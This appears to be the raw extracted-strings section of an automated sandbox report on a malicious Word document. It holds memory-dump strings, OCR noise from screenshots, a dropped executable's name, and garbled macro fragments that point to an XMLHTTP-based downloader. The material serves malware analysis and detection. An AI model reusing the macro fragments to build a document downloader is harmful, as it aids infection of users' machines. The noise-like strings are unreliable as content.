Ansi based on Image Processing (screen_12.png)

.1014

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

.?AVGroupBoxFrameImp

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

.?AVVertFrameImp[email protected]@@

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

._...___._...

Ansi based on Image Processing (screen_8.png)

._._.

Ansi based on Image Processing (screen_3.png)

._._..

Ansi based on Image Processing (screen_13.png)

._._..___._._..

Ansi based on Image Processing (screen_7.png)

.___..

Ansi based on Image Processing (screen_2.png)

._i_'0_i'____r--._,..

Ansi based on Image Processing (screen_4.png)

.Count`\ [email protected](2)`<

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

.iii._'0'i'ii_.

Ansi based on Image Processing (screen_12.png)

.iil._'0'i'il__.

Ansi based on Image Processing (screen_8.png)

.iil._0i'il__.

Ansi based on Image Processing (screen_2.png)

.rsrc

Ansi based on Dropped File (08g7g6r56r[1].exe.188093)

.text

Ansi based on Dropped File (08g7g6r56r[1].exe.188093)

/ePoPgSlhash>mhb>Str $([email protected]@q.J Buat#f{'Aqgl

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

/n /dde

Ansi based on Process Commandline (WINWORD.EXE)

/SOURCE 1 /LCID 1031 /WAITPID 3216

Ansi based on Process Commandline (OffDiag.exe)

/T*Y>,cy'$gC."Vso+C1Ot}8>V3mBb%DWs'O''Gw~lh;UM!;CK^ysJJ1KR)~./

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0$6\7

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

0,,__,0____

Ansi based on Image Processing (screen_3.png)

0,,__,____

Ansi based on Image Processing (screen_4.png)

00400h000] ]$ ]$8]$P] h] ] D] ] ] ^^(^@^ 2X^PxpH^^^p ^^([email protected]^X^p^^^^^^p] ] 0] H] `] x]'|'~P $! [email protected] p]*****~*~****}*******}****~********~***********}****D,'tZUDBAGZUDBAEZUDBATZUDBA$'v v t+$x [email protected] 08, R H S A$|'pd !R+A "H+A $S+A #R+H+A &H+S+A 'R+H+S+A$|'kzzTEMP$$' [email protected]~``

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0046}#2.0#0#%WINDIR%\SysWOW64\e2.tlb#OLE Automation`ENormalENCrmaQF *\C

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

008_______,0

Ansi based on Image Processing (screen_2.png)

00__________0

Ansi based on Image Processing (screen_1.png)

01KG=0O B01;8F04

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]`Bhp6B "(P"X`"h$B2

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0__=?9_0,

Ansi based on Image Processing (screen_9.png)

0___'__0

Ansi based on Image Processing (screen_14.png)

0___'__0e_

Ansi based on Image Processing (screen_13.png)

0___,_i_____,0

Ansi based on Image Processing (screen_8.png)

0_______,0

Ansi based on Image Processing (screen_12.png)

0_______0

Ansi based on Image Processing (screen_3.png)

0_v,_

Ansi based on Image Processing (screen_1.png)

[email protected] XxB&" 8Ph

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0Cun____C99

Ansi based on Image Processing (screen_0.png)

0Kembalip0RootT0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0PosNama0AmbilAlamat2/0KeyIkuto0KeyBuat|:0vm0CreateObject0Slash0hKey$0ss8X0FrmUtama=0TVO_0AddNode10

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0QCall CopyMemdVarPtr())

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0si_infarbi-

Ansi based on Image Processing (screen_7.png)

0si_intarbi_

Ansi based on Image Processing (screen_8.png)

0Sikinfarbi_

Ansi based on Image Processing (screen_4.png)

0Tiilin

Ansi based on Image Processing (screen_13.png)

0u?=?9_0,

Ansi based on Image Processing (screen_11.png)

0woo&5

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

0zwg_,sg_gn

Ansi based on Image Processing (screen_13.png)

1\1e1|1

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

2 2$2(2,2024282<[email protected]

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

2%f(h 2%f(d 2%f(d 2%f(d (X % 2%f(d *!H 2%f(d` . 2%f(d "$j 2%f(d & 2%f(dqp $ |e8U l$ '0 0\5n!p L5H%[email protected]!p P5H%[email protected] 5H5X Z5X \ P7J!^'6d L7J!^'6kx 0 65b%d.2 2%f(d 2%f(d 2%f(d 2%f(dFolder 2%f(d . 2%f(d 2%f(dqkkqi8]]]]H7y7yMicEFV212VSD$LKJCDrosoft$.XMLHTTP88IUYGH7766$$.]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

354W4

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

3<4<'!r(LAKeyAMEhNodeGa,#[email protected] [email protected]`, "\"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

3A__g,n0,dngn

Ansi based on Image Processing (screen_13.png)

3E"R+6AhaH*8"S* -L"H+? 9) xd If!Exit F2

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

4 4(4

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

4518.1014

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

[email protected](UPWP

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

4K5]5c5

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

4X5\5`5d5h5l5p5

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

5 5$5(5,5054585<5[email protected]

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

5 5([email protected],:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

5(6,6064686<[email protected]\6`6d6

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

5B A?8A:0PK![Content_Types][email protected]%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

6,606L6P6l6p6

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

6]uVhVnR+n;)bLX6Y`+qB](0H1$6_[s)k8Tm Aa?R d0{eRF&

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

6FI.szTyp76G8Hex(W+9Ocq% Q*,Iolder#R= Right$, Q=bs">okusNo31In, "\"s&2<<FromDc Q=2.hDCPK610/%X-!(f#3`P32 _5(4_5w_5_5ID1'_5L)U5O0D00em0-1-"+)-G-G,"Fr$+ 0+BO*Qwow0 i|!K`eyIku?pBvuv/@

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

6hB6ROPr!5r. 7iL =S= %+ |,>UUegQ+ [email protected]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

7 7,787

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

7`8v?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

7b%f!d'6. 7b%f!d'!` !!b%d.

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

7C98k

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

7K:!;?={=

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

86"8B88888c

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

8Cw&<Cw

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

8HBP`hx

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

8PK!^}-theme/theme/theme1.xmlYnE#':U

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

9 9$9(9,9094989<[email protected]

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

9 9$9(9,9094989<[email protected]\9`9d9h9l9p9t9x9

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

9$909<9

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

9h>p>x>

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

9{x\.pAdd( 7#!qx<.S+` Ex<[email protected]}"2a i5dMedAny;@.A1n1

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

:C*OiIA64HpUa7UO3d:([email protected]>N"Hhp&hA38)SUUR'V5&HM.6xpyn,!h^^Z4~0#w,,&

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

; ;$;(;,;0;4;8;<;

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

; ;8;"<J<

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

;,Favorit(By0Val , [email protected]!-cntgoS`[email protected](1).Visi_

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

<$<R<

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

<*<b==?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

<,<W<

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

<9=B=M=U=

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

<:>u?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>[email protected](

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

<B=F=J=N=R=V=Z=^=Q?s?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

<S=O>

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

<W=$>i>

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

= =$=

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

= Get(aWith [email protected]\@@F =A&T"tmp"USensifUD= CreatteVWO|&H40, &H2-0&Z0, 0wW .Pi`c1.ClQaLdSH`

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

= Lpeft$B5-g"KIfi!HCarihSel1(k0ax!cYpos_ ``dEFi`1 To IbaG`<(i).ed`[email protected]<',ubl(2wc\a=

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

=$>*>C>

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

=)=j?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

==3=A=

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

=>@>}>

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

=L=n?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

=L>p>

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

=q>p?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

=rZ On Error Resume Next D i0So UBdkthzU#.TV &kPth(iO\Pa = .Get ?q%Z<>F 3[c.Exd(p(alseA

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

=V>k>7?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

> a+ [+ 1.PicSplit.Ud- ImgKZ1.(E`370tO_W>u&

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

>!>?#?P?}?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

>(*'bjbj11.SS!-----ammmmmm$.--000

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

>1?A?Q?j?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

>6?M?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

>?"?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

>^>d>k>

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

>G?m?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

>t>"?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

>|>W?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

? ?$?(?,?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

? ?$?(?,?0?4?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

? ?$?(?,?0?4?8?<?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

? ?$?(?,?0?4?8?<[email protected]?D?H?L?P?T?X?\?`?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

? ?([email protected]?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

?,?e?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

???__???s??___

Ansi based on Image Processing (screen_11.png)

??_?_____0____________r__

Ansi based on Image Processing (screen_5.png)

??j`[email protected] [email protected]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]?D?H?L?P?T?X?\?`?d?h?

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

[email protected]@YAXXZ

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

@%SystemRoot%\system32\dnsapi.dll,-103

Unicode based on Runtime Data (noeebene.exe )

@%SystemRoot%\System32\fveui.dll,-843

Unicode based on Runtime Data (noeebene.exe )

@%SystemRoot%\System32\fveui.dll,-844

Unicode based on Runtime Data (noeebene.exe )

@%SystemRoot%\system32\p2pcollab.dll,-8042

Unicode based on Runtime Data (noeebene.exe )

@%SystemRoot%\system32\qagentrt.dll,-10

Unicode based on Runtime Data (noeebene.exe )

@.data

Ansi based on Dropped File (08g7g6r56r[1].exe.188093)

@] !Hid 5b! 7b%f!d$'[email protected] n [email protected]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

@JPBB B(*0`Bhp

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

@NottKCall Cre`UN, @SCRS5

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

@}w7c(EbCA7K

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[Host Extender Info]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[Workspace]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

\notebene.txtte$'`[email protected]`T`i [email protected]`d8 [email protected]`ko [email protected] [email protected]``i .

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

]p]]]]]]] $'. $ ~" tmp $'* *[email protected]$:', ,[email protected]<5>[email protected]@[email protected]@ *$ *$ * . [email protected] * L5H%J5> NAF * P5H%J5B RAF *[email protected] '(dHd d$VX'(k5H5X Z5X \ P7J!^'6d L7J!^'6k $'8 `G 8 *'8j 8 65b%d.2

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

^. %Foc

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

^o#I&%0]SPV!]PK!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

_,,0___

Ansi based on Image Processing (screen_2.png)

_,,0____

Ansi based on Image Processing (screen_1.png)

_,0_,_

Ansi based on Image Processing (screen_14.png)

_,0__

Ansi based on Image Processing (screen_13.png)

_,___,_,,..____,_

Ansi based on Image Processing (screen_2.png)

_--_--a-

Ansi based on Image Processing (screen_8.png)

_-=--a_t

Ansi based on Image Processing (screen_12.png)

_-=--aPt

Ansi based on Image Processing (screen_8.png)

_-=_-=

Ansi based on Image Processing (screen_1.png)

_-__-O-

Ansi based on Image Processing (screen_4.png)

_..,..

Ansi based on Image Processing (screen_8.png)

_..0_.._

Ansi based on Image Processing (screen_3.png)

_.0__

Ansi based on Image Processing (screen_8.png)

_0--mi_auru_

Ansi based on Image Processing (screen_3.png)

_0____

Ansi based on Image Processing (screen_0.png)

_80___

Ansi based on Image Processing (screen_7.png)

_8___

Ansi based on Image Processing (screen_13.png)

_:Jzi;_innummirn-

Ansi based on Image Processing (screen_7.png)

_?___

Ansi based on Image Processing (screen_11.png)

__--micauruc

Ansi based on Image Processing (screen_2.png)

__-._O'

Ansi based on Image Processing (screen_4.png)

__-_.._._.

Ansi based on Image Processing (screen_3.png)

__.-O'

Ansi based on Image Processing (screen_12.png)

___---

Ansi based on Image Processing (screen_5.png)

___---J

Ansi based on Image Processing (screen_9.png)

_____

Ansi based on Image Processing (screen_1.png)

_____=--______

Ansi based on Image Processing (screen_0.png)

_____?

Ansi based on Image Processing (screen_6.png)

______

Ansi based on Image Processing (screen_13.png)

_________--________

Ansi based on Image Processing (screen_1.png)

__________

Ansi based on Image Processing (screen_6.png)

__________:.__--,____

Ansi based on Image Processing (screen_3.png)

__________:.__--_____

Ansi based on Image Processing (screen_13.png)

__________:.__--______

Ansi based on Image Processing (screen_8.png)

___________..';;_;_;.;;_

Ansi based on Image Processing (screen_4.png)

______g

Ansi based on Image Processing (screen_2.png)

______i___

Ansi based on Image Processing (screen_2.png)

______i____

Ansi based on Image Processing (screen_8.png)

_____w0_

Ansi based on Image Processing (screen_5.png)

____g

Ansi based on Image Processing (screen_14.png)

____g__

Ansi based on Image Processing (screen_3.png)

____mn.

Ansi based on Image Processing (screen_2.png)

___Jg__

Ansi based on Image Processing (screen_1.png)

__Cl'i-hi-n

Ansi based on Image Processing (screen_4.png)

__CxxFrameHandler

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

__D_'jhjn

Ansi based on Image Processing (screen_8.png)

__Dl'jhjn

Ansi based on Image Processing (screen_7.png)

__dllonexit

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

__Jzi;_innummirn_

Ansi based on Image Processing (screen_8.png)

__L__

Ansi based on Image Processing (screen_1.png)

__p__commode

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

__p__fmode

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

__set_app_type

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

__setusermatherr

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

__wgetmainargs

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_aBbCcl

Ansi based on Image Processing (screen_0.png)

_adjust_fdiv

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_ayout

Ansi based on Image Processing (screen_13.png)

_B_var_Chr\;0`!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

_B_var_Midp0_B_var_Right90_B_var_LeftQ0_B_var_FrmUtama0_B_var_LoooaS;0_B_var_ru0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

_berarbeitungen

Ansi based on Image Processing (screen_2.png)

_birarbiitun9_fin_tir_

Ansi based on Image Processing (screen_2.png)

_birarbiitungin

Ansi based on Image Processing (screen_2.png)

_birarbiitungtfinttir_

Ansi based on Image Processing (screen_3.png)

_birprafin

Ansi based on Image Processing (screen_3.png)

_birprofin

Ansi based on Image Processing (screen_2.png)

_controlfp

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_E;nese_e

Ansi based on Image Processing (screen_13.png)

_except_handler3

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_exit

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_i'ii__r

Ansi based on Image Processing (screen_13.png)

_i__'0_i'''__r--._,..)

Ansi based on Image Processing (screen_3.png)

_ilb_t

Ansi based on Image Processing (screen_2.png)

_initterm

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

_JGr6Bi_

Ansi based on Image Processing (screen_4.png)

_jGreBi-

Ansi based on Image Processing (screen_7.png)

_jGreBi_

Ansi based on Image Processing (screen_8.png)

_L____

Ansi based on Image Processing (screen_2.png)

_markupanzi;gin_

Ansi based on Image Processing (screen_3.png)

_markupanziigin_

Ansi based on Image Processing (screen_2.png)

_mg,n___,n_,gn

Ansi based on Image Processing (screen_13.png)

_ndirungin

Ansi based on Image Processing (screen_3.png)

_Neue,Fen,ter

